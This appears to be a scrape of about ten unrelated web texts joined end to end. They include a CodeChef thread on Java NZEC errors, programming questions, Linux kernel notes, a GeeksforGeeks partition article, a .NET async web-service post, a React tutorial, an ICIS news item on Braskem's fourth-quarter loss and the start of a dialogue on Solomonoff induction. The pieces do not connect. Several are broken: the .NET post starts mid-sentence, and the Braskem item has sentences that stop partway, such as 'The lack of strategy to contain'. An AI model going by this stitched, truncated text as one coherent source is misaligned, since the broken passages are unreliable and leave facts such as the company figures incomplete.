But if it throws an exception, the rest of the code will not execute, so you'll get a WA instead. It is better to check that your input format is correct, i.e. while using BufferedReader and especially the readLine() function; you should also take care of ArrayIndexOutOfBounds exceptions. The above format will only help you find where the error is occurring, and then only if you have the specific failing cases — the example cases or many small cases may still pass.

NO, actually it's not like that! That's the convention for how you write it at the beginning of the method. It's a built-in exception class. The way I coded it is similar to the version below, and both mean the same, just a different writing convention:

public static void main(String[] args) {
    try {
        //Your Solve
    } catch(IOException e) {
        System.err.println(e.getMessage());
        return;
    }
}

My code runs well on my laptop but gets Runtime Error (NZEC) while submitting it... Why is that?

I have code that is correct but gives NZEC when submitted. How can I post the code I wrote to discuss it with others?

One thing I've noticed is that using StringTokenizer to parse input is always better than using the split function. The latter often leads to IOException/NZEC.

Please check your solution; sometimes it is just that your solution is giving a wrong answer. Try all the cases you can.
I faced it recently, went through all possible cases, and found that one test case was failing; after changing my code accordingly, CodeChef accepted my solution :)

please post ur code

NZEC means "Non Zero Exit Code". It essentially says that your program ran into some error during execution. Mostly it comes up when there is a Segmentation Fault. The SegFault can be caused by many things, but experience says it is mainly through two causes:
(a) Infinite recursion - basically when you run out of stack memory.
(b) Incorrect memory access - whenever there is some weird stuff happening with memory allocation/access. C++ isn't as friendly as Java: it will not explicitly tell you that you have an "ArrayIndexOutOfBounds Exception", but will instead try to use the "supposed" memory even if it is outside the block. This makes things a bit hard to debug, if you're accessing things far out, for example.

Some sample code that should give NZEC on CodeChef/SPOJ:

Example 1: DFS

void dfs(int u) {
    visited[u]++;
    for(int v = 0; v < N; v++)
        if(adjmat[u][v] == 1)
            dfs(v);
}

did that exception thing but my laptop is showing perfectly right answer… in that case where should i start looking for the error in my code…

If you are submitting the code by copying from your IDE, make sure you select the code from the import statements, not from your package statement. Including the package statement will also give you an NZEC error. Please check your submission.
import java.util.*;

public class Main {
    public static final double BANK_CHARGES = 0.50;

    public static void main(String[] args) {
        Scanner console = new Scanner(System.in);
        System.out.printf("\t\tInput : \n\t\t");
        int x = console.nextInt();
        double y = console.nextDouble();
        check(x, y);
        y = y - x - BANK_CHARGES;
        output(y);
    }

    public static void check(int x, double y) {
        if (x % 5 != 0) {
            output(y);
            System.out.printf("\n\t\tIncorrect Withdrawble Amount (not multiple of 5)\n\n");
            throw new IllegalArgumentException();
        } else if ((y - x - BANK_CHARGES) < 0) {
            output(y);
            System.out.printf("\n\t\tInsufficient Fund\n\n");
            throw new IllegalArgumentException();
        }
    }

    public static void output(double y) {
        System.out.printf("\n\t\tOutput :\n\t\t%.2f", y);
    }
}

NZEC error... This code runs well on my laptop but gets Runtime Error (NZEC) while submitting it.

import java.util.*;

class Main {
    public static void main(String[] arg) {
        Scanner scan = new Scanner(System.in);
        int n = scan.nextInt();
        int arr[] = new int[n];
        for (int i = 0; i < n; ++i) {
            arr[i] = scan.nextInt();
        }
        System.out.println(rec(arr, n));
    }

    public static int rec(int arr[], int n) {
        if (n == 0) return 0;
        if (n == 1) return arr[0];
        if (n == 2) {
            if (arr[0] < arr[1]) return arr[0];
            else return arr[1];
        }
        int mat[] = new int[n];
        mat[0] = arr[0];
        mat[1] = arr[1];
        mat[2] = arr[2];
        for (int i = 3; i < n; ++i) {
            mat[i] = arr[i] + min(mat[i - 1], mat[i - 2], mat[i - 3]);
        }
        return min(mat[n - 1], mat[n - 2], mat[n - 3]);
    }

    public static int min(int a, int b, int c) {
        if (a <= b && a <= c) return a;
        else if (c <= b && c <= a) return c;
        else return b;
    }
}

This code runs well on my laptop but gets Runtime Error (NZEC) while submitting. Please help.
I DON'T UNDERSTAND WTF IS WRONG IN MY CODE. IT'S WORKING PERFECTLY ON JDK 9 AND CODECHEF IS SAYING IT HAS AN NZEC RUNTIME ERROR.

/**
 * @author Aashlesh Dhumane
 */
public class Main {

    /**
     * @param args the command line arguments
     * @throws java.lang.Exception
     */
    public static void main(String[] args) throws Exception {
        // TODO code application logic here
        int n;
        int i, j, k, l;
        System.out.println("enter the test cases");
        String str;
        BufferedReader b = new BufferedReader(new InputStreamReader(System.in));
        str = b.readLine();
        n = Integer.parseInt(str);
        // for (i=0;i<n;i++)
        // {
        while (n > 0) {
            str = b.readLine();
            i = Integer.parseInt(str);
            str = b.readLine();
            j = Integer.parseInt(str);
            str = b.readLine();
            k = Integer.parseInt(str);
            str = b.readLine();
            l = Integer.parseInt(str);
            if ((i == j && k == l) || (j == k && l == i) || (i == k && j == l)) {
                System.out.println("YES");
            } else {
                System.out.println("NO");
            }
            n--;
        }
    }
}

Try using the fast I/O given on geeksforgeeks.org. If the error still persists, get back to us.

Alright, I don't seem to have high enough Karma or something to ask a separate question, so I thought I'd post it here since the topic is related. I keep getting an NZEC error at the spot I marked by a comment in my code when running it on the online IDE set to the problem CHEFCHR (I'm aware the contest is still going on, which is why I omitted specific code to prevent illegal use):

/* package codechef; // don't place package name! */

import java.util.*;
import java.lang.*;
import java.io.*;

/* Name of the class has to be "Main" only if the class is public. */
class Codechef {
    public static void main(String[] args) throws java.lang.Exception {
        Scanner sc = new Scanner(System.in);
        int cases = sc.nextInt(); // THE NZEC ERROR IS HAPPENING HERE
        for (int i = 0; i < cases; i++) {
            String s = sc.next();
            /* Omitted code for sake of confidentiality since the contest is still running */
        }
    }
}

When I run this code in my IDE (NetBeans), I'm fine and everything works perfectly.
When I run it on the online IDE with custom input, everything is fine as well. When I run it with the CHEFCHR input, I'm given an NZEC error. When I've been submitting, it's been telling me my code gives the wrong answer. Even if I run LITERALLY ONLY the code below, I get the same exact NZEC error:

import java.util.*;
import java.lang.*;
import java.io.*;

class Codechef {
    public static void main(String[] args) throws java.lang.Exception {
        Scanner sc = new Scanner(System.in);
        int cases = sc.nextInt();
    }
}

What am I doing wrong if even just calling for Scanner to read in an integer is giving me an error?

Further example of the absolute insanity going on right now: a proven AC solution to a practice problem, versus me copying and pasting that EXACT same code into the online IDE and submitting the solution to that SAME EXACT practice problem. Both programs are EXACTLY the same. No alterations. Both are answering the same question. Yet one is right and one is wrong. Plz help, I'm losing my marbles.

Post your code using the "code" HTML tag or link your code.

I am facing the same problem. I have used the Scanner class for input, and I am getting the error on the exact same line. I have tried the try-catch block. The NZEC problem still persists. Please help.
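A common cause of the symptom described above — `sc.nextInt()` failing on the very first read — is that no token is actually available (for example, an empty input stream in the IDE). One defensive sketch (not the fix for any specific submission, just the guard pattern): check `hasNextInt()` before reading.

```java
import java.util.Scanner;

public class Main {
    public static void main(String[] args) {
        Scanner sc = new Scanner(System.in);
        if (!sc.hasNextInt()) {   // nothing to read: exit 0 instead of NoSuchElementException/NZEC
            return;
        }
        int cases = sc.nextInt();
        System.out.println(cases);
    }
}
```

`Scanner.nextInt()` throws `NoSuchElementException` on an empty stream, which surfaces as NZEC on the judge even though the same code "works" locally when you type input by hand.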
https://discusstest.codechef.com/t/how-to-get-rid-of-getting-nzec-error-while-submitting-solution-in-java/2826
Hey everyone, what's up? I'm trying to write a C++ program that's way out of my league. So, no responses about how "I need to learn more" or "what you're trying to do is beyond your skill" or any of that stuff. I already know this. I am here to get an answer. I also know that there are plenty of apps that help with what I'm trying to achieve, but none of them do specifically what I want.

Picture this. I'm sitting at a brown table with 3 flashcard-sized areas (slots) tinted green, represented horizontally. Ex.

    | slot 1 |   | slot 2 |   | slot 3 |

I have 109 cards. Each card has 4 properties. Ex.

    Card #1
      Weakness to Frost
      Fortify Sneak
      Weakness to Poison
      Fortify Restoration

{step1} (Function???) Place Card#1 in slot 1 (always choose the lowest numbered card available).

{step2} Then place Card#2 (next lowest numbered card available) in slot 2. Now look for similarities (Boolean???) between Card#1 and Card#2. "If" there are none, "then" replace Card#2 with Card#3 and check again. Keep this up until slot 1 and slot 2 match. Ex.

    Card#1                   Card#4
    Weakness to Frost        Restore Health
    Fortify Sneak            Fortify Light Armor
    Weakness to Poison       Resist Shock
    Fortify Restoration      Weakness to Frost

    These would not be a match
    Damage Magicka           Damage Magicka Regen

{step3} Repeat {step2} for slot 3, starting from the lowest numbered card available (Card#2, since it is not in any slot), until slot 3 matches any of the other slots. Ex.

    Card#1                   Card#4                   Card#5
    Weakness to Frost        Restore Health           Resist Fire
    Fortify Sneak            Fortify Light Armor      Weakness to Shock
    Weakness to Poison       Resist Shock             Fortify Lockpicking
    Fortify Restoration      Weakness to Frost        Fortify Sneak

{step4} This must be written down (temporary database????) to show that Card#1 + Card#4 + Card#5 = 4 (representing the # of properties that are similar between all 3 cards).

That's all for now. I would end up taking too much space if I wrote the whole thing. I have Visual Studio 2010 with only some basic knowledge of C++. So, if this needs to be written in another language, please let me know.

Here's what I feel needs to be done. Wouldn't I need to build something (database, data range, etc.) to hold all 109 cards' info? Or should I "define" each card as having 4 "variables"? Ex.

    using namespace std;

    int Card_One (Weakness_To_Frost, Fortify_Sneak, Weakness_To_Poison, Fortify_Restoration);
    int Card_Two (Damage_Stamina, Fortify_Conjuration, Damage_Magicka_Regen, Fortify_Enchanting);
    int Card_Three (Damage_Stamina, Invisibility, Resist_Fire, Fortify_Destruction);
    int Card_Four (Restore_Health, Fortify_Light_Armor, Resist_Shock, Weakness_To_Frost);
    int Card_Five (Resist_Fire, Weakness_To_Shock, Fortify_Lockpicking, Fortify_Sneak);

    int _main()
    {
        return 0;
    }
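The poster invites other languages, so here is one language-agnostic way to model the data, sketched in Java: each card is a set of effect names, and "similarity" between two cards is the size of the set intersection. The card contents come from the examples above; everything else (class names, the `shared` helper) is illustrative, not a definitive design.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class Main {
    // Count the properties shared by two cards; a "match" = at least one shared.
    static int shared(Set<String> a, Set<String> b) {
        Set<String> s = new HashSet<>(a);
        s.retainAll(b);          // set intersection
        return s.size();
    }

    public static void main(String[] args) {
        Set<String> card1 = new HashSet<>(Arrays.asList(
            "Weakness to Frost", "Fortify Sneak", "Weakness to Poison", "Fortify Restoration"));
        Set<String> card4 = new HashSet<>(Arrays.asList(
            "Restore Health", "Fortify Light Armor", "Resist Shock", "Weakness to Frost"));
        Set<String> card5 = new HashSet<>(Arrays.asList(
            "Resist Fire", "Weakness to Shock", "Fortify Lockpicking", "Fortify Sneak"));

        System.out.println(shared(card1, card4)); // 1: "Weakness to Frost"
        System.out.println(shared(card1, card5)); // 1: "Fortify Sneak"
        System.out.println(shared(card4, card5)); // 0: no shared property
    }
}
```

With 109 cards this could be a list of 109 such sets; the slot logic in steps 1–3 then reduces to scanning for the lowest-numbered card whose intersection with the current slots is non-empty.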
http://programmersheaven.com/discussion/437506/how-should-i-start
Linux is written in the ''C'' language, and as every application it has global variables:

    Global variable -------> | Item(1) | -> | Item(2) | -> | Item(3) | ...

    Current ---------------> | Actual process |

Current points to the ''task_struct'' structure, which contains all data about a process, like:

    file_systems ----------> | ext2 | -> | msdos | -> | ntfs |      [fs/super.c]

When you use a command like ''modprobe some_fs'' you will add a new entry to the file systems list, while removing it (by using ''rmmod'') will delete it.

    mount_hash_table ------> | / | -> | /usr | -> | /var |          [fs/namespace.c]

When you use the ''mount'' command to add a filesystem, the new entry will be inserted in the list, while an ''umount'' command will delete the entry.

    ptype_all -------------> | ip | -> | x25 | -> | ipv6 |          [net/core/dev.c]

For example, if you add support for IPv6 (loading the relative module), a new entry will be added to the list.

    dev_base --------------> | lo | -> | eth0 | -> | ppp0 |         [drivers/core/Space.c]

    chrdevs ---------------> | lp | -> | keyb | -> | serial |       [fs/devices.c]

''chrdevs'' is not a pointer to a real list, but a standard vector.

    bdev_hashtable --------> | fd | -> | hd | -> | scsi |           [fs/block_dev.c]

''bdev_hashtable'' is a hash vector.
http://www.tldp.org/HOWTO/KernelAnalysis-HOWTO-14.html
I need to find a big-theta notation for an algorithm I made. The algorithm is supposed to find the factors of a number. This is the algorithm implemented in Java:

public class factor {
    public static void main(String argv[]) {
        int number = Integer.parseInt(argv[0]);
        int counter = 0;
        for (counter = 1; counter <= number / 2; counter++) {
            if (number % counter == 0)
                System.out.println(counter);
        }
        System.out.println(number);
    }
}

I figured the theta notation for this is O(N). The problem now is that I need to express big theta as a function of the length of N (the number of bits in N). I have no idea what I am supposed to do here. I would greatly appreciate it if anyone could help.
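A sketch of the standard argument the question is looking for (this is not from the thread itself): let b be the number of bits of N. Then

```latex
b = \lfloor \log_2 N \rfloor + 1
\quad\Longrightarrow\quad
N \ge 2^{\,b-1}
\quad\Longrightarrow\quad
\Theta\!\left(\tfrac{N}{2}\right) = \Theta(N) = \Theta\!\left(2^{b}\right)
```

So a loop that runs N/2 times is linear in the *value* N but exponential in the *input length* b — which is why trial-division factoring is called pseudo-polynomial.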
http://www.dreamincode.net/forums/topic/66103-big-theta-notation/
Aaron Mulder wrote:
> Dude, need you use the f-bomb? Is this -- "Non-technical
> tip: think about the f***ing users" -- honestly your idea of a
> professional interaction with your peers?

Dude, do you think ignoring the needs of users is professional software development? That breaking everyone's application because you couldn't be bothered to think of an upgradable solution is professional behaviour? Before throwing the p-word around, look in the mirror.

> By the way, I think you were exaggerating when you said "tell them
> this is a *good* thing because we're going to keep changing things until
> 1.0 finally comes out". Do you feel that's an accurate representation of
> the other side of this conversation?

"+100000000 before we release 1.0 is exactly when we should be encouraging this type of drastic change." I read that as saying there will continue to be drastic changes until the 1.0 release - is that interpretation inaccurate? If you were a user, in light of that statement, would you look at this software now or would you wait until after 1.0?

> As far as stability goes, I hate to say it, but we're not there
> yet. I'm going to have to make massive changes to my book for the next
> milestone. The entire security system looks nothing like it did in M3,
> web services were not present in M3, MDBs did not work in M3, CMP was
> incomplete in M3, there was no Tomcat option at all in M3, and the list
> goes on. Add all that up, and removing 6 characters from a namespace is a
> trivial change. I don't think anyone *should* be contemplating Geronimo
> for anything "serious". We haven't even released a beta yet!

You might want to re-read what you said here. M3 was incomplete, which is different from incompatible. You make a good point with respect to security, though - immediately after M3 was cut, all the security definitions incompatibly changed, showing that, indeed, this project really does place little value on compatibility.

It's not that the change itself isn't trivial, but that it is unnecessary and impacts EVERYONE. I would have hoped someone with your extensive "professional" experience would have understood that.

> And on the topic of coordination for builds, it's true we could do
> better. But you know what? Flaming me (or David, not sure who you were
> targeting, really) doesn't help. If you'd like to propose a build, such
> as M4, and ask for a feature freeze while we prepare and test it, I think
> that would be a great idea. It would have been nice to have done that
> before we announced that we pass the test, but let's go from where we are.

> As far as design work goes, we've historically not had the
> position of review-then-commit. I think we're trying to increase the
> amount of discussion and planning on the list, but I'm not prepared to go
> to a review-then-commit strategy. Are you? Short of that, yes, let's
> talk on the list as we have been, but we also need to be prepared to make
> adjustments to code that's committed as issues are identified.

Now who's exaggerating? You asked for "constructive" tips; one of those is "when you're about to break everyone's application, bring it up on the list first, as other people may be able to help you find a way to avoid doing so." That avoids firedrills after and keeps users happier.

-- Jeremy
http://mail-archives.apache.org/mod_mbox/geronimo-dev/200507.mbox/%3C42C976B2.7090107@apache.org%3E
Given an array of non-negative integers of length N and an integer k, partition the given array into two subarrays of lengths k and N - k so that the difference between the sums of the two subarrays is maximum.

Examples :

Input : arr[] = {8, 4, 5, 2, 10}, k = 2
Output : 17
Explanation : Here, we can make the first subarray of length k = {4, 2} and the second subarray of length N - k = {8, 5, 10}. Then, max_difference = (8 + 5 + 10) - (4 + 2) = 17.

Input : arr[] = {1, 1, 1, 1, 1, 1, 1, 1}, k = 3
Output : 2
Explanation : Here, the subarrays would be {1, 1, 1, 1, 1} and {1, 1, 1}. So, max_difference would be 2.

First consider a simpler problem: choose k numbers with the largest possible sum. The solution is obviously the k largest numbers, so here a greedy algorithm works - at each step we choose the largest possible number until we get all k numbers.

In this problem we should divide the array of N numbers into two subarrays of k and N - k numbers respectively. Consider two cases:

- The subarray with the larger sum, among these two subarrays, is the subarray of k numbers. Then we want to maximize its sum, since the sum of the second subarray will only decrease as the sum of the first subarray increases. So we are now in the sub-problem considered above and should choose the k largest numbers.

- The subarray with the larger sum, among these two subarrays, is the subarray of N - k numbers. Similarly to the previous case, we then have to choose the N - k largest numbers among all numbers.

Now, let's think about which of the two cases above actually gives the answer. We can easily see that the difference is larger when more numbers are included in the group of largest numbers. Hence we can set M = max(k, N - k), find the sum of the M largest numbers (let it be S1), and then the answer is S1 - (S - S1), where S is the sum of all numbers.
Below is the implementation of the above approach :

C++

// CPP program to calculate max_difference between
// the sum of two subarrays of length k and N - k
#include <bits/stdc++.h>
using namespace std;

// Function to calculate max_difference
int maxDifference(int arr[], int N, int k)
{
    int M, S = 0, S1 = 0, max_difference = 0;

    // Sum of the array
    for (int i = 0; i < N; i++)
        S += arr[i];

    // Sort the array in descending order
    sort(arr, arr + N, greater<int>());

    M = max(k, N - k);
    for (int i = 0; i < M; i++)
        S1 += arr[i];

    // Calculating max_difference
    max_difference = S1 - (S - S1);
    return max_difference;
}

// Driver function
int main()
{
    int arr[] = { 8, 4, 5, 2, 10 };
    int N = sizeof(arr) / sizeof(arr[0]);
    int k = 2;
    cout << maxDifference(arr, N, k) << endl;
    return 0;
}

Python3

# Python3 code to calculate max_difference
# between the sum of two subarrays of
# length k and N - k

# Function to calculate max_difference
def maxDifference(arr, N, k):
    S = 0
    S1 = 0
    max_difference = 0

    # Sum of the array
    for i in range(N):
        S += arr[i]

    # Sort the array in descending order
    arr.sort(reverse = True)

    M = max(k, N - k)
    for i in range(M):
        S1 += arr[i]

    # Calculating max_difference
    max_difference = S1 - (S - S1)
    return max_difference

# Driver Code
arr = [ 8, 4, 5, 2, 10 ]
N = len(arr)
k = 2
print(maxDifference(arr, N, k))

# This code is contributed by "Sharad_Bhardwaj".
PHP

<?php
// PHP program to calculate
// max_difference between
// the sum of two subarrays
// of length k and N - k

// Function to calculate
// max_difference
function maxDifference($arr, $N, $k)
{
    $S = 0;
    $S1 = 0;
    $max_difference = 0;

    // Sum of the array
    for ($i = 0; $i < $N; $i++)
        $S += $arr[$i];

    // Sort the array in
    // descending order
    rsort($arr);

    $M = max($k, $N - $k);
    for ($i = 0; $i < $M; $i++)
        $S1 += $arr[$i];

    // Calculating
    // max_difference
    $max_difference = $S1 - ($S - $S1);
    return $max_difference;
}

// Driver Code
$arr = array(8, 4, 5, 2, 10);
$N = count($arr);
$k = 2;
echo maxDifference($arr, $N, $k);

// This code is contributed
// by anuj_67.
?>

Output :

17

Further Optimizations : We can use a Heap (or priority queue) to find the M largest elements efficiently. Refer to "k largest (or smallest) elements in an array" for details.
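The "Further Optimizations" note can be sketched concretely. This heap-based variant (written here in Java; it is not part of the original article's three implementations) keeps a min-heap of the M largest elements seen so far, giving O(N log M) instead of a full O(N log N) sort:

```java
import java.util.PriorityQueue;

public class Main {
    // Sum of the M largest elements via a size-M min-heap, then S1 - (S - S1).
    static int maxDifference(int[] arr, int k) {
        int n = arr.length, m = Math.max(k, n - k), total = 0;
        PriorityQueue<Integer> heap = new PriorityQueue<>(); // min-heap
        for (int x : arr) {
            total += x;
            heap.add(x);
            if (heap.size() > m) heap.poll(); // evict the smallest: heap keeps the m largest
        }
        int s1 = 0;
        for (int x : heap) s1 += x;
        return s1 - (total - s1);
    }

    public static void main(String[] args) {
        System.out.println(maxDifference(new int[]{8, 4, 5, 2, 10}, 2)); // 17
        System.out.println(maxDifference(new int[]{1, 1, 1, 1, 1, 1, 1, 1}, 3)); // 2
    }
}
```

Both example inputs from the problem statement reproduce the expected outputs (17 and 2).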
https://www.geeksforgeeks.org/partition-into-two-subarrays-of-lengths-k-and-n-k-such-that-the-difference-of-sums-is-maximum/
public struct Bar
{
    public int i;
}

[WebMethod]
public int Foo( Bar bar )
{
    System.Threading.Thread.Sleep(2000);
    return bar.i;
}

Next, let's take some client code to make everything clear:

// this class holds the details needed to get results back,
// which include the web service instance and the IAsyncResult
public class AsyncDetails
{
    public SimpleProcess Function;
    public IAsyncResult AsyncResult;

    public AsyncDetails( SimpleProcess function, IAsyncResult result )
    {
        Function = function;
        AsyncResult = result;
    }
}

public void TestRun()
{
    ArrayList results = new ArrayList();
    SimpleProcess process = new SimpleProcess();

    // note - the behavior only becomes obvious when passing
    // a struct or class - value parameters only help mask the
    // real underlying behavior.
    Bar bar = new Bar();

    // Launch 20 running instances and aggregate them in an
    // ArrayList for further processing
    for( int x = 0; x < 20; x++ )
    {
        // this works the same whether I use a shared webservice instance or
        // create a new instance for each call
        bar.i = x;
        results.Add( new AsyncDetails( process, process.BeginFoo(bar, null, null)));
    }

    // next, go through each result and complete processing.
    // real-world app would be aggregating results at this point
    foreach( AsyncDetails detail in results )
    {
        // assuming that processing is order dependent...
        if( !detail.AsyncResult.IsCompleted )
            detail.AsyncResult.AsyncWaitHandle.WaitOne();
        Console.WriteLine( detail.Function.EndFoo( detail.AsyncResult ));
    }
}

What would you expect the output to be - {0, 1, 2, 3, 4, 5, 6, ..., 19} in roughly 2 seconds? Wrong. The answer is: {19, 19, 19, 19, 19, ..., 19} in roughly 10 seconds!

Why is this? It turns out my operating assumption is incorrect. My belief that BeginFoo(...) actually launched a request is completely invalid - it only queues the request. If the requests were run as I expected, my Bar struct would be serialized during my call to BeginFoo(...).
Because it's being queued, the actual physical call being made to Foo is using the shared Bar struct, which has a value of 19 when the call is actually made! Furthermore, when you watch this run in NUnit you'll see that it's actually making two requests at a time (two results appear simultaneously, two-second wait, two more results appear simultaneously, two-second wait, and so on).

My answer to this problem four years ago was to place synchronous requests in a worker threadpool and manage the threads - it turns out that was the right call. After looking at the behavior of .NET, it appears that it is also running these calls on background threads. When doing this, you have to be conscious of the number of threads being used to service these requests (especially if you're making these from within a web application or webservice). I would have hoped the .NET implementation would have been more elegant than my thrown-together threadpool, but it turns out that's just not the case. Perhaps they could have used overlapped I/O with sockets, available since Winsock 2? I suppose if you are making these calls over the public internet you risk being mistaken for an attempted DOS source.

[Update 7/20/2006 - It turns out the two connection limit is a machine.config level setting. Check out my followup to this post for more details. While this is configurable, all calls are still being made within .NET's threadpool - so if you are making web service calls from a server-side web application/service, you are dealing with a limited resource.]

[Note:] The MSDN documentation errantly states: "The client instructs the Begin method to start processing the service call, but return immediately." It's the "start processing the service call" line that should be reworded to "queue the service call".
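The "queued, not started" pitfall the post describes is language-independent. A deterministic analogy, sketched here in Java rather than the .NET code above (the queue-then-run structure is illustrative): queue tasks that capture one shared mutable object, mutate it in the loop, and only then run them — every task observes the final value, just as every Foo call above observed 19.

```java
import java.util.ArrayDeque;
import java.util.Queue;

public class Main {
    static class Bar { int i; }  // stands in for the shared struct in the post

    public static void main(String[] args) {
        Bar bar = new Bar();
        Queue<Runnable> queued = new ArrayDeque<>();
        for (int x = 0; x < 5; x++) {
            bar.i = x;
            Bar captured = bar;   // every task captures the SAME object
            queued.add(() -> System.out.println(captured.i));
        }
        // Nothing has executed yet; only now do the "calls" actually happen.
        while (!queued.isEmpty()) queued.poll().run(); // prints 4 five times
    }
}
```

The fix, in either ecosystem, is to snapshot the value at queue time (e.g. copy the struct, or capture an immutable value) rather than sharing one mutable instance across queued work.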
http://codebetter.com/blogs/steve.hebert/archive/2006/07/14/147371.aspx
An Introduction to React Components

Any user interface can be broken into smaller parts. These parts are components of the UI. An example is the page you are viewing right now (the dev.to page). Let's try to break it into smaller parts. First, we have two major parts: the navbar on top of the page and the body that contains the text you are reading. The navbar can further be broken down into smaller parts. We have a search field, a link for writing a post, a notification icon and a dropdown menu with an image on top. Each of these parts is a component that makes up the navbar of this page. They can be referred to as sub-components of the navbar. So the page is made up of components (the navbar and body) that have sub-components. The more complex the UI is, the more components it can be broken into.

Let's get a proper definition now. A component is a reusable chunk of code. Components make it possible to divide any UI into independent, reusable pieces and think about these pieces in isolation. Just like a pure function, a component should ideally do just one thing.

What are we waiting for? Let's create a component right away. We are going to create a component that welcomes people to a page. It is really basic, but it is important that we start with this so that we can easily understand how to create and render a component. Here's a Codepen of what we want to achieve.

import React from "react";
import ReactDOM from "react-dom";

class Greeting extends React.Component {
  render() {
    return (
      <div className="box">
        <h2> Hello Human Friend!!!</h2>
        <p> We are so glad to have you here. </p>
      </div>
    );
  }
}

ReactDOM.render(<Greeting />, document.getElementById("app"));

It's okay if you don't understand what's going on in the code. I'll explain each part shortly. Let's start with the first part.

import React from "react";
import ReactDOM from "react-dom";

react and react-dom are JavaScript libraries. react is the React library. It contains the methods that you need in order to use React. react-dom is a JavaScript library which contains several methods that deal with the DOM in some way. What we are doing here is simply assigning these libraries to variables so that their methods can be used anywhere in our js file.

class Greeting extends React.Component {
  ...

The above is the syntax for creating a component class. Here we are making use of the ES6 class to make a component class. This component class itself is not a component but a factory that is used to create components. Confusing huh? It is similar to a CSS class. You define a class in a CSS file once. Then you can use this class in several places throughout your HTML file. Each time you use the class, all properties of the class are added to the HTML element you use it for. So here, you define a component class and use it to create components with the same methods that were defined in the component class.

Greeting is the name of your component class. In React, components conventionally start with a capital letter to differentiate them from normal HTML elements. The extends keyword is used in class declarations or class expressions to create a class as a child of another class. That is, to create a subclass of a class. To create this component class, you use a base class from the React library, which is React.Component. When you do this, you are actually subclassing React.Component. So the above is the syntax for creating a component class.

Note: This is not the only way to create a component. I just find this one more convenient.

render() {
  return (
    <div className="box">
      <h2> Hello Human friend</h2>
      <p> We are so glad to have you here. </p>
    </div>
  );
}

render() is an important part of each component class. It should be present in every component class. It must also contain a return statement. Basically, render() is a function that defines what should be returned in a component. This could be a React element, a string or number, or even a component. The render() function should be pure. This means that it does not modify component state, it returns the same result each time it's invoked, and it does not directly interact with the browser. So in our component, the render() function will return an element, which is the <div>.

Finally,

ReactDOM.render(<Greeting />, document.getElementById("app"));

ReactDOM.render causes your component to appear on the screen. Remember, a self-closing tag must always contain the forward slash before the closing angle bracket in JSX.

Once more, here's a link to the Codepen where you can see the component that was just created. You can always play with it to ensure that you understand it. Now, if I ever want to welcome people on any other part of my app, I'll simply use the <Greeting /> component. Cool!!!

There you have it, an introduction to React components. Got any questions? Any additions? Feel free to leave a comment. Thank you for reading :)
https://sarahchima.com/blog/intro-to-react-components/
14 March 2012 16:15 [Source: ICIS news]

Correction: In the ICIS story headlined "Corrected: Brazil's Braskem reports $112m loss in fourth quarter" dated 14 March 2012, please read the headline as "…$112m loss…" instead of "…$111m loss…".

MEDELLIN, Colombia (ICIS)--Brazil's Braskem, Latin America's largest petrochemical company, reported a quarterly loss of reais (R) 201m ($112m, €85m) for the fourth quarter amid higher raw-material costs, slowing demand and narrowing spreads in global markets, the company said during a conference call on Wednesday.

Earnings before interest, tax, depreciation and amortisation (EBITDA), a gauge of operating profit, was $396m during the quarter, down 33% year on year. In 2011, EBITDA reached $2.2bn, down 3% year on year. Net revenue increased 25% to R8.7bn in the quarter, up from R7.0bn year on year, Braskem said.

Domestic sales volumes dropped 12% for thermoplastic polymers and 6% for polyvinyl chloride (PVC), owing to competition from increasing imports, Braskem said. Costs jumped 39% in the quarter to over R8bn. The lack of strategy to contain

The average capacity utilisation rate of the company's crackers was 80% amid two maintenance shutdowns - one scheduled for October at the Triunfo site in the state of Rio Grande do Sul, and the other at the Camacari site in the state of Bahia. The Camacari maintenance was originally planned for early 2012, but was moved up to November in view of market conditions, according to the company.

Braskem's new PVC and vinyl chloride monomer (VCM) plants in the state of Alagoas are expected to start in May 2012. The plant will have a capacity of 200,000 tonnes/year, increasing the total PVC capacity at Alagoas to 460,000 tonnes/year.

Currently, Braskem's total PVC capacity exceeds 500,000 tonnes/year, produced mainly at its plants in Alagoas and

The company pushed back the start-up of a new butadiene (BD) plant one month, to July, at the Triunfo petrochemical complex in the southern state of

The first phase of engineering for the Comperj project, the new petrochemical complex to be built in the state of

Project financing for Braskem's joint venture with Mexico-based Idesa for the Ethylene XXI project in

Braskem and Idesa expect to start up the 1.05m tonnes/year cracker project in mid-2015, Idesa CEO Jose Luis Uriegas said in November. The project, which comprises an integrated ethane cracker and polyethylene (PE) units, was originally scheduled to start up in early 2015. Downstream production will comprise two high density polyethylene (HDPE) plants with capacities of 350,000 and 400,000 tonnes/year and one 300,000 tonne/year low density polyethylene (LDPE) plant, Uriegas said.

($1 = €0.76) ($1 = R
http://www.icis.com/Articles/2012/03/14/9541680/corrected-brazils-braskem-reports-112m-loss-in-fourth-quarter.html
(Originally posted in December 2015: A dialogue between Ashley, a computer scientist who's never heard of Solomonoff's theory of inductive inference, and Blaine, who thinks it is the best thing since sliced bread.)

i. Unbounded analysis

ASHLEY: Good evening, Msr. Blaine.

BLAINE: Good evening, Msr. Ashley.

ASHLEY: I've heard there's this thing called "Solomonoff's theory of inductive inference".

BLAINE: The rumors have spread, then.

ASHLEY: Yeah, so, what the heck is that about?

BLAINE: Invented in the 1960s by the mathematician Ray Solomonoff, the key idea in Solomonoff induction is to do sequence prediction by using Bayesian updating on a prior composed of a mixture of all computable probability distributions—

ASHLEY: Wait. Back up a lot. Before you try to explain what Solomonoff induction is, I'd like you to try to tell me what it does, or why people study it in the first place. I find that helps me organize my listening. Right now I don't even know why I should be interested in this.

BLAINE: Um, okay. Let me think for a second...

ASHLEY: Also, while I can imagine things that "sequence prediction" might mean, I haven't yet encountered it in a technical context, so you'd better go a bit further back and start more at the beginning. I do know what "computable" means and what a "probability distribution" is, and I remember the formula for Bayes's Rule although it's been a while.

BLAINE: Okay. So... one way of framing the usual reason why people study this general field in the first place, is that sometimes, by studying certain idealized mathematical questions, we can gain valuable intuitions about epistemology. That's, uh, the field that studies how to reason about factual questions, how to build a map of reality that reflects the territory—

ASHLEY: I have some idea what 'epistemology' is, yes. But I think you might need to start even further back, maybe with some sort of concrete example or something.

BLAINE: Okay. Um. So one anecdote that I sometimes use to frame the value of computer science to the study of epistemology is Edgar Allan Poe's argument in 1833 that chess was uncomputable.

ASHLEY: That doesn't sound like a thing that actually happened.

